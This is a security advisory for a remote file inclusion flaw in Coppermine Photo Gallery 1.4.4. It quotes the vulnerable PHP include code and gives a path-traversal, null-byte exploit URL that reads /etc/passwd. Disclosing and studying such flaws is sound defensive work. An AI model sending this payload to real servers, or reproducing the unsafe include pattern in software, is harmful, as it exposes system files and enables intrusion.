CPG Coppermine Photo Gallery 1.4.4-stable suffers from a remote file inclusion vulnerability.
f74ac15d7c943ee2d55a9d38b4635ac553d008574cc5957da4e5e9cd78058b4c
??????-Summary?????-
Software: CPG Coppermine Photo Gallery
Sowtware?s Web Site: http://coppermine.sourceforge.net/
Versions: 1.4.4.stable
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: imei addmimistrator
Risk Level: High
??????Description?????
There is a security flaw in Coppermine Photo Gallery, one of popular photo galleries in internet, that allows attacker perform a Remote File inclusion attack.
bug is in a security flaw in plugin inclusion system.this system do not propely validate parameter $_GET[?file?] and have a simple removing speacial char mechanism that is evasionable easy.
?????See Also??????
file:{index.php}39
$file = str_replace(?//?,'?,str_replace(?..?,'?,$_GET[?file?]));
$path = ?./plugins/?.$file.?.php?;
// Don?t include the codebase and credits files
if ($file != ?codebase? && $file != ?configuration? && file_exists($path)) {
// Include the code from the plugin
include_once($path);
$file = true;
}
?????Exploit???????-
/cpg/index.php?file=.//././/././/././/././/././/././/././/././/./etc/passwd%00
?????Credit????????
Discovered by: imei addmimistrator
addmimistrator(4}gmail(O}com
imei(4}Kapda(O}IR
www.myimei.com
myimei.com/security